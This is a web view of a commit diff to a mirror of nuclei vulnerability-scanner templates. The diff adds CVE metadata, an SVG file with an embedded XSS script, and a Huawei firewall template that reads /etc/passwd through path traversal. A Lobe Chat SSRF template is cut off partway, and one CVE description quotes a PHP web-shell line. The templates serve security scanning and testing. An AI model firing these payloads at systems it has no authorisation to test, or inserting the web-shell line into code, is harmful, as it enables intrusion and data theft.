daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into main

patch-12
evilgensec 2024-10-05 21:51:45 +05:45 committed by GitHub
parent 69b78f17b0 4fdd2662fa
commit cd4a4fc30a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
221 changed files with 1286 additions and 266 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
.new-additions
View File

@ -1,10 +1,24 @@
code/cves/2024/CVE-2024-45409.yaml
http/cves/2017/CVE-2017-5871.yaml
http/cves/2019/CVE-2019-19411.yaml
http/cves/2021/CVE-2021-25094.yaml
http/cves/2024/CVE-2024-32964.yaml
http/cves/2024/CVE-2024-43160.yaml
http/cves/2024/CVE-2024-43917.yaml
http/cves/2024/CVE-2024-45440.yaml
http/cves/2024/CVE-2024-46627.yaml
http/cves/2024/CVE-2024-5488.yaml
http/cves/2024/CVE-2024-6517.yaml
http/cves/2024/CVE-2024-7354.yaml
http/cves/2024/CVE-2024-7714.yaml
http/cves/2024/CVE-2024-8877.yaml
http/default-logins/datagerry/datagerry-default-login.yaml
http/exposed-panels/gitlab-saml.yaml
http/exposed-panels/riello-netman204-panel.yaml
http/miscellaneous/seized-site.yaml
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml
http/technologies/arcgis-detect.yaml
http/technologies/vertigis-detect.yaml
http/technologies/wiki-js-detect.yaml
http/token-spray/api-intigriti.yaml
http/vulnerabilities/retool/retool-svg-xss.yaml

9
cves.json
View File

@ -749,6 +749,7 @@
{"ID":"CVE-2019-1898","Info":{"Name":"Cisco RV110W RV130W RV215W Router - Information leakage","Severity":"medium","Description":"A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-1898.yaml"}
{"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19134.yaml"}
{"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-19368.yaml"}
{"ID":"CVE-2019-19411","Info":{"Name":"Huawei Firewall - Local File Inclusion","Severity":"low","Description":"USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.\n","Classification":{"CVSSScore":"3.7"}},"file_path":"http/cves/2019/CVE-2019-19411.yaml"}
{"ID":"CVE-2019-1943","Info":{"Name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","Severity":"medium","Description":"Cisco Small Business 200,300 and 500 Series Switches contain an open redirect vulnerability in the Web UI. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-1943.yaml"}
{"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-19781.yaml"}
{"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-19824.yaml"}
@ -2522,6 +2523,7 @@
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"}
{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"}
@ -2578,6 +2580,7 @@
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
@ -2585,9 +2588,11 @@
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
@ -2601,6 +2606,7 @@
{"ID":"CVE-2024-5315","Info":{"Name":"Dolibarr ERP CMS `list.php` - SQL Injection","Severity":"critical","Description":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-5315.yaml"}
{"ID":"CVE-2024-5420","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","Severity":"high","Description":"A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-5420.yaml"}
{"ID":"CVE-2024-5421","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","Severity":"high","Description":"A vulnerability was identified in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, impacting the file handling functions. This flaw results in authenticated file disclosure, granting unauthorized access to sensitive files and directories. Although authentication is required, the vulnerability poses a significant risk of data exposure. This vulnerability is publicly disclosed and identified as CVE-2024-5421.\n","Classification":{"CVSSScore":"8.7"}},"file_path":"http/cves/2024/CVE-2024-5421.yaml"}
{"ID":"CVE-2024-5488","Info":{"Name":"SEOPress \u003c 7.9 - Authentication Bypass","Severity":"critical","Description":"The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5488.yaml"}
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
@ -2616,6 +2622,7 @@
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting users session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
@ -2639,7 +2646,9 @@
{"ID":"CVE-2024-7332","Info":{"Name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","Severity":"critical","Description":"A critical vulnerability has been discovered in TOTOLINK CP450 version 4.1.0cu.747_B20191224. This vulnerability affects an unknown part of the file /web_cste/cgi-bin/product.ini of the Telnet Service component. The issue stems from the use of a hard-coded password, which can be exploited remotely without any user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7332.yaml"}
{"ID":"CVE-2024-7339","Info":{"Name":"TVT DVR Sensitive Device - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-7339.yaml"}
{"ID":"CVE-2024-7340","Info":{"Name":"W\u0026B Weave Server - Remote Arbitrary File Leak","Severity":"high","Description":"The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-7340.yaml"}
{"ID":"CVE-2024-7354","Info":{"Name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","Severity":"medium","Description":"The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-7354.yaml"}
{"ID":"CVE-2024-7593","Info":{"Name":"Ivanti vTM - Authentication Bypass","Severity":"critical","Description":"Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7593.yaml"}
{"ID":"CVE-2024-7714","Info":{"Name":"AI Assistant with ChatGPT by AYS \u003c= 2.0.9 - Unauthenticated AJAX Calls","Severity":"medium","Description":"The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-7714.yaml"}
{"ID":"CVE-2024-7786","Info":{"Name":"Sensei LMS \u003c 4.24.2 - Email Template Leak","Severity":"high","Description":"The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-7786.yaml"}
{"ID":"CVE-2024-7928","Info":{"Name":"FastAdmin \u003c V1.3.4.20220530 - Path Traversal","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-7928.yaml"}
{"ID":"CVE-2024-7954","Info":{"Name":"SPIP Porte Plume Plugin - Remote Code Execution","Severity":"critical","Description":"The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7954.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
b6a34b5af003995fdb01f1a9faa80b94
34d767d0d4ce4e7d79ac3e12ad34b41b

8
helpers/payloads/retool-xss.svg Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('document.domain');
</script>
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 381 B

47
http/cves/2019/CVE-2019-19411.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2019-19411
info:
name: Huawei Firewall - Local File Inclusion
author: taielab
severity: low
description: |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
reference:
- https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 3.7
cve-id: CVE-2019-19411
cwe-id: CWE-665
epss-score: 0.00078
epss-percentile: 0.34692
cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: huawei
product: usg9500
shodan-query: title:"HUAWEI"
tags: cve,cve2019,huawei,firewall,lfi
http:
- method: GET
path:
- "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502201592da827242899c082ee79fadb679c8f4d09f39015c2826f479656d871f61d8022100b1df18deb058c6e3ab7a79da64776a7d4cecf21ca4f9a2fb6efee7785266ae55:922c64590222798bb761d5b6d8e72950

59
http/cves/2024/CVE-2024-32964.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2024-32964
info:
name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
author: s4e-io
severity: critical
description: |
Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-32964
- https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
- https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
- https://vulert.com/vuln-db/CVE-2024-32964
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
cvss-score: 9
cve-id: CVE-2024-32964
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 2
vendor: lobehub
product: lobe-chat
fofa-query: icon_hash="1975020705"
tags: cve,cve2024,lobechat,ssrf
flow: http(1) && http(2)
http:
- raw:
- |
GET /welcome HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
